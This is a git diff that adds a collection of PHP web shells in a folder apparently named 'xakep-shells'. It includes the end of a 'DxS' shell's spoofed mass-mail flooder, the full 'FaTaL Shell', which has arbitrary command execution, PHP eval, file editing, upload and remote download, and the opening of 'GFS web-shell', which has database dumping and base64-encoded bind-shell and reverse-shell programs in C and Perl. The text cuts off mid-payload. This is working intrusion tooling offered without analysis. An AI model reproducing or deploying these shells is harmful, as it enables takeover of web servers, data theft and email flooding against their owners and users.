+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{
		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{
		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)
		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/xakep-shells/PHP/Fatalshell.php.php.txt b/xakep-shells/PHP/Fatalshell.php.php.txt
new file mode 100644
index 0000000..c43d10d
--- /dev/null
+++ b/xakep-shells/PHP/Fatalshell.php.php.txt
@@ -0,0 +1,283 @@
+<?php
+session_start();
+error_reporting(E_ALL ^ E_NOTICE);
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+if(@get_magic_quotes_gpc()){foreach ($_POST as $k=>$v){$_POST[$k] = stripslashes($v);}}
+@ini_set('max_execution_time',0);
+(@ini_get('safe_mode')=="1" ? $safe_mode="ON" : $safe_mode="OFF(Rootla_Beni:)");
+
+(@ini_get('disable_functions')!="" ? $disfunc=ini_get('disable_functions') : $disfunc=0);
+(strtoupper(substr(PHP_OS, 0, 3))==='WIN' ? $os=1 : $os=0);
+$version='version 1.0 by FaTaLErrOr';
+$action=$_POST['action'];
+$file=$_POST['file'];
+$dir=$_POST['dir'];
+$content='';
+$stdata='';
+$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}select{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{background-color: #A8A8AD;color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
+$header='<html><head><title>'.getenv("HTTP_HOST").' - FaTaL Shell v1.0</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1254">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
+$footer='</body></html>';
+
+$lang=array(
+'filext'=>'Lutfen Dosyayi Adlandiriniz Yada Degistiriniz.',
+'uploadok'=>'Baþarýyla Yüklendi.',
+'dircrt'=>'Klasör Oluþturuldu.',
+'dontlist'=>'Listelenemiyor Ýzin Yok.',
+'dircrterr'=>'Oluþturulamýyor Ýzin Yok.',
+'dirnf'=>'Dizin Bulunamadi.',
+'filenf'=>'.',
+'dontwrdir'=>'Sadece Okunabilir.',
+'empty'=>'Dizin Boþ Deðil Yada Ýzin Yok.',
+'deletefileok'=>'Dosya Silindi.',
+'deletedirok'=>'Klasör Silindi.',
+'isdontfile'=>'Lütfen Full Url Yazýn. c:/program files/a.php Gibi',
+'cantrfile'=>'Dosya Açýlamýyor izin Yok.',
+'onlyracc'=>'Dosya Editlenemiyor Okuma Ýzni Var Sadece..',
+'workdir'=>'Çalýþma Dizini: ',
+'fullacc'=>'Full Yetki.',
+'fullaccdir'=>'Full Yetkiniz Var Dosya Silip Düzenleyebilirsiniz.',
+'thisnodir'=>'Klasör Seçin.',
+'allfuncsh'=>'Fonksiyoýnlar Kapalý.'
+);
+
+$act=array('viewer','editor','upload','shell','phpeval','download','delete','deletedir');//here added new actions
+
+function test_file($file){
+if(!file_exists($file))$err="1";
+elseif(!is_file($file)) $err="2";
+elseif(!is_readable($file))$err="3";
+elseif(!is_writable($file))$err="4"; else $err="5";
+return $err;}
+
+function test_dir($dir){
+if(!file_exists($dir))$err="1";
+elseif(!is_dir($dir)) $err="2";
+elseif(!is_readable($dir))$err="3";
+elseif(!is_writable($dir))$err="4"; else $err="5";
+return $err;}
+
+function perms($file){ 
+  $perms = fileperms($file);
+  if (($perms & 0xC000) == 0xC000) {$info = 's';} 
+  elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} 
+  elseif (($perms & 0x8000) == 0x8000) {$info = '-';} 
+  elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} 
+  elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} 
+  elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} 
+  elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} 
+  else {$info = 'u';}
+  $info .= (($perms & 0x0100) ? 'r' : '-');
+  $info .= (($perms & 0x0080) ? 'w' : '-');
+  $info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
+  $info .= (($perms & 0x0020) ? 'r' : '-');
+  $info .= (($perms & 0x0010) ? 'w' : '-');
+  $info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
+  $info .= (($perms & 0x0004) ? 'r' : '-');
+  $info .= (($perms & 0x0002) ? 'w' : '-');
+  $info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
+  return $info;} 
+
+function view_size($size){
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;}
+
+if(isset($action)){if(!in_array($action,$act))$action="viewer";else $action=$action;}else $action="viewer";
+
+if(isset($dir)){
+  $ts['test']=test_dir($dir); 
+  switch($ts['test']){
+    case 1:$stdata.=$lang['dirnf'];break;
+    case 2:$stdata.=$lang['thisnodir'];break;
+    case 3:$stdata.=$lang['dontlist'];break;
+    case 4:$stdata.=$lang['dontwrdir'];$dir=chdir($GLOBALS['dir']);break;
+    case 5:$stdata.=$lang['fullaccdir'];$dir=chdir($GLOBALS['dir']);break;}
+}else $dir=@chdir($dir);
+
+$dir=getcwd()."/";
+$dir=str_replace("\\","/",$dir);
+
+if(isset($file)){
+    $ts['test1']=test_file($file);
+  switch ($ts['test1']){
+    case 1:$stdata.=$lang['filenf'];break;
+	case 2:$stdata.=$lang['isdontfile'];break;
+	case 3:$stdata.=$lang['cantrfile'];break;
+	case 4:$stdata.=$lang['onlyracc'];$file=$file;break;
+	case 5:$stdata.=$lang['fullacc'];$file=$file;break;}
+}
+
+function shell($cmd)
+{
+  global $lang;
+ $ret = '';
+ if (!empty($cmd))
+ {
+  if(function_exists('exec')){@exec($cmd,$ret);$ret = join("\n",$ret);}
+  elseif(function_exists('shell_exec')){$ret = @shell_exec($cmd);}
+  elseif(function_exists('system')){@ob_start();@system($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$ret = @ob_get_contents();@ob_end_clean();}
+  elseif(@is_resource($f = @popen($cmd,"r"))){$ret = "";while(!@feof($f)) { $ret .= @fread($f,1024); }@pclose($f);}
+  else $ret=$lang['allfuncsh'];
+ }
+ return $ret;
+}
+
+function createdir($dir){mkdir($dir);}
+
+//delete file
+if($action=="delete"){ 
+if(unlink($file)) $content.=$lang['deletefileok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
+}
+//delete dir
+if($action=="deletedir"){ 
+if(!rmdir($file)) $content.=$lang['empty']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
+else $content.=$lang['deletedirok']."<a href=\"#\" onclick=\"document.reqs.action.value='viewer';document.reqs.dir.value='".$dir."'; document.reqs.submit();\"> AnaSayfaya Dönemk Ýçin Týklayýnýz.</a>";
+}
+//shell
+if($action=="shell"){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"shell\">
+<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
+<textarea readonly rows=\"15\" cols=\"150\">".convert_cyr_string(htmlspecialchars(shell($_POST['command'])),"d","w")."</textarea><br>
+<input type=\"submit\" value=\"Uygula\"></form>";}
+//editor  
+if($action=="editor"){
+  $stdata.="<form method=POST>
+  <input type=\"hidden\" name=\"action\" value=\"editor\">
+  <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+  Dosyanýn Adý (Full Url Yazýn)<input type=text name=file value=\"".($file=="" ? $file=$dir : $file=$file)."\" size=50><input type=submit value=\"Editle\"></form>";	  
+  function writef($file,$data){
+  $fp = fopen($file,"w+");
+  fwrite($fp,$data);
+  fclose($fp);
+}
+  function readf($file){
+  clearstatcache();
+  $f=fopen($file, "r");
+  $contents = fread($f,filesize($file));
+  fclose($f);
+  return htmlspecialchars($contents);
+}
+if(@$_POST['save'])writef($file,$_POST['data']);
+if(@$_POST['create'])writef($file,"");
+$test=test_file($file);
+if($test==1){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+File name:<input type=\"text\" name=\"file\" value=\"".$file."\" size=\"50\"><br>
+<input type=\"submit\" name=\"create\" value=\"Create new file with this name?\">
+<input type=\"reset\" value=\"No\"></form>";
+}
+if($test>2){
+$content.="<form method=\"POST\">
+<input type=\"hidden\" name=\"action\" value=\"editor\">
+<input type=\"hidden\" name=\"file\" value=\"".$file."\">
+<textarea name=\"data\" rows=\"30\" cols=\"180\">".@readf($file)."</textarea><br>
+<input type=\"submit\" name=\"save\" value=\"Kaydet\"><input type=\"reset\" value=\"Reset\"></form>";
+}}
+//viewer
+if($action=="viewer"){
+$content.="<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
+$content.="<tr><td><form method=POST>Klasore Git:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"Git\"></form></td></tr>";
+  if (is_dir($dir)) {
+    if (@$dh = opendir($dir)) {
+        while (($file = readdir($dh)) !== false) {
+		  if(filetype($dir . $file)=="dir") $dire[]=$file;
+		  if(filetype($dir . $file)=="file")$files[]=$file;
+		}
+		closedir($dh);
+		@sort($dire);
+		@sort($files);
+		if ($GLOBALS['os']==1) {
+		  $content.="<tr><td>HDD Secin:";
+		  for ($j=ord('C'); $j<=ord('Z'); $j++) 
+		   if (@$dh = opendir(chr($j).":/"))
+		   $content.='<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
+		   $content.="</td></tr>";
+		 }
+		$content.="<tr><td>Sistem: ".@php_uname()."</td></tr><tr><td></td><td>Biçim</td><td>Boyut</td><td>izin</td><td>Seçenekler</td></tr>";
+		for($i=0;$i<count($dire);$i++) {
+		  $link=$dir.$dire[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>Klasor</td><td></td><td>'.perms($link).'</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\''.$link.'\'; document.reqs.submit();" title="Klasörü Sil">X</a></td></tr>';  
+		}
+		for($i=0;$i<count($files);$i++) {
+		  $linkfile=$dir.$files[$i];
+		  $content.='<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>Dosya</td><td>'.view_size(filesize($linkfile)).'</td><td>'.perms($linkfile).'</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\''.$linkfile.'\';document.reqs.dir.value=\''.$dir.'\'; document.reqs.submit();" title="Bu Dosyayi Sil">X</a></td></tr>'; 
+		}
+		$content.="</table>";
+}}}
+//downloader
+if($action=="download"){ 
+header('Content-Length:'.filesize($file).'');
+header('Content-Type: application/octet-stream');
+header('Content-Disposition: attachment; filename="'.$file.'"');
+readfile($file);}
+//phpeval
+if($action=="phpeval"){
+$content.="<form method=\"POST\">
+ <input type=\"hidden\" name=\"action\" value=\"phpeval\">
+ <input type=\"hidden\" name=\"dir\" value=\"".$dir."\">
+ &lt;?php<br>
+ <textarea name=\"phpev\" rows=\"5\" cols=\"150\">".@$_POST['phpev']."</textarea><br>
+ ?><br>
+ <input type=\"submit\" value=\"Uygula\"></form>";
+if(isset($_POST['phpev']))$content.=eval($_POST['phpev']);}
+//upload
+if($action=="upload"){
+  if(isset($_POST['dirupload'])) $dirupload=$_POST['dirupload'];else $dirupload=$dir;
+  $form_win="<tr><td><form method=POST enctype=multipart/form-data>
+  <input type=\"hidden\" name=\"action\" value=\"upload\">  
+  Buraya Uploadla:<input type=text name=dirupload value=\"".$dirupload."\" size=50></tr></td><tr><td>Dosyayý Adlandýr (Gerekli) :<input type=text name=filename></td></tr><tr><td><input type=file name=file><input type=submit name=uploadloc value='Upload Et'></td></tr>";
+  if($os==1)$content.=$form_win;
+  if($os==0){
+    $content.=$form_win;
+	$content.='<tr><td><select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>File addres:<input type=text name=urldown>
+<input type=submit name=upload value=Upload></form></td></tr>';	
+}
+
+if(isset($_POST['uploadloc'])){
+if(!isset($_POST['filename'])) $uploadfile = $dirupload.basename($_FILES['file']['name']); else 
+$uploadfile = $dirupload."/".$_POST['filename'];
+
+if(test_dir($dirupload)==1 && test_dir($dir)!=3 && test_dir($dir)!=4){createdir($dirupload);}
+if(file_exists($uploadfile))$content.=$lang['filext']; 
+elseif (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) 
+$content.=$lang['uploadok'];
+}
+
+if(isset($_POST['upload'])){
+    if (!empty($_POST['with']) && !empty($_POST['urldown']) && !empty($_POST['filename']))
+	switch($_POST['with'])
+	{
+	  case wget:shell(which('wget')." ".$_POST['urldown']." -O ".$_POST['filename']."");break;
+ 	  case fetch:shell(which('fetch')." -o ".$_POST['filename']." -p ".$_POST['urldown']."");break;
+ 	  case lynx:shell(which('lynx')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case links:shell(which('links')." -source ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case GET:shell(which('GET')." ".$_POST['urldown']." > ".$_POST['filename']."");break;
+ 	  case curl:shell(which('curl')." ".$_POST['urldown']." -o ".$_POST['filename']."");break;
+}}}
+//end function
+?><?=$header;?>
+<style type="text/css">
+<!--
+.style4 {
+	font-size: x-large;
+	font-weight: bold;
+}
+.style5 {color: #FF0000}
+.style8 {color: #CCFF00}
+-->
+</style>
+
+<a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();"><p align="center" class="style4">FaTaLSheLL v1.0 </p></a>
+<table width="100%" bgcolor="#336600" align="right" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="#" onclick="document.reqs.action.value='shell';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Shell </a></td><td><a href="#" onclick="document.reqs.action.value='viewer';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Ana Sayfa</a></td><td><a href="#" onclick="document.reqs.action.value='editor';document.reqs.file.value='<?=$file;?>';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Editle</a></td><td><a href="#" onclick="document.reqs.action.value='upload';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Dosya Upload</a></td><td><a href="#" onclick="document.reqs.action.value='phpeval';document.reqs.dir.value='<?=$dir;?>'; document.reqs.submit();">| Php Eval |</a></td><td><a href="#" onclick="history.back();"> <-Geri |</a></td><td><a href="#" onclick="history.forward();"> Ýleri->|</a></td></tr></table></td></tr></table><br><form name='reqs' method='POST'><input name='action' type='hidden' value=''><input name='dir' type='hidden' value=''><input name='file' type='hidden' value=''></form>
+<p>&nbsp;</p>
+<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1> <tr><td><span class="style8">Safe mode:</span> <?php echo $safe_mode;?><br>
+      <span class="style8">Fonksiyon Kýsýtlamasý:</span> <?php echo $disfunc;?><br>
+      <span class="style8">Sistem:</span> <?php echo @php_uname();?><br>
+      <span class="style8">Durum:</span> <?php echo @$stdata;?></td>
+</tr></table><table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?=$content;?></td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://www.starhack.org">COPYRIGHT BY StarHack.oRg <?=$version;?></a></td></tr></table></tr></td></table><?=$footer;?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt b/xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt
new file mode 100644
index 0000000..98fb031
--- /dev/null
+++ b/xakep-shells/PHP/GFS web-shell ver 3.1.7 - PRiV8.php.txt	
@@ -0,0 +1,618 @@
+<?
+/*
+*************************
+*  ###### ##### ######  *
+*  ###### ##### ######  *
+*  ##     ##    ##      *
+*  ##     ####  ######  *
+*  ##  ## ####  ######  *
+*  ##  ## ##        ##  *
+*  ###### ##    ######  *
+*  ###### ##    ######  *
+*                       *
+* Group Freedom Search! *
+*************************
+GFS Web-Shell
+*/
+error_reporting(0);
+if($_POST['b_down']){
+ $file=fopen($_POST['fname'],"r");
+ ob_clean();
+ $filename=basename($_POST['fname']);
+ $filedump=fread($file,filesize($_POST['fname']));
+ fclose($file);
+ header("Content-type: application/octet-stream");
+ header("Content-disposition: attachment; filename=\"".$filename."\";");
+ echo $filedump;
+ exit();
+}
+if($_POST['b_dtable']){
+ $dump=down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+ if($dump!=""){
+  header("Content-type: application/octet-stream");
+  header("Content-disposition: attachment; filename=\"".$_POST['tablename'].".dmp\";");
+  echo down_tb($_POST['tablename'], $_POST['dbname'],$_POST['host'], $_POST['username'], $_POST['pass']);
+  exit();
+ }else
+  die("<b>Error dump!</b><br> table=".$_POST['tablename']."<br> db=".$_POST['dbname']."<br> host=".$_POST['host']."<br> user=".$_POST['username']."<br> pass=".$_POST['pass']);
+}
+set_magic_quotes_runtime(0);
+set_time_limit(0);
+ini_set('max_execution_time',0);
+ini_set('output_buffering',0);
+if(version_compare(phpversion(), '4.1.0')==-1){
+ $_POST=&$HTTP_POST_VARS;
+ $_GET=&$HTTP_GET_VARS;
+ $_SERVER=&$HTTP_SERVER_VARS;
+}
+if (get_magic_quotes_gpc()){
+ foreach ($_POST as $k=>$v){
+  $_POST[$k]=stripslashes($v);
+ }
+ foreach ($_SERVER as $k=>$v){
+  $_SERVER[$k]=stripslashes($v);
+ }
+}
+if ($_POST['username']==""){
+ $_POST['username']="root";
+}
+////////////////////////////////////////////////////////////////////////////////
+///////////////////////////// Ïåðåìåííûå ///////////////////////////////////////
+////////////////////////////////////////////////////////////////////////////////
+$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE'];
+$r_act=$_POST['r_act'];
+$safe_mode=ini_get('safe_mode');               //ñòàòóñ áåçîïàñíîãî ðåæèìà
+$mysql_stat=function_exists('mysql_connect');  //Íàëè÷èå mysql
+$curl_on=function_exists('curl_version');      //íàëè÷èå cURL
+$dis_func=ini_get('disable_functions');        //çàáëîêèðîâàíûå ôóíêöèè
+$HTML=<<<html
+<html>
+<head>
+<title>GFS web-shell ver 3.1.7</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+html;
+$port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
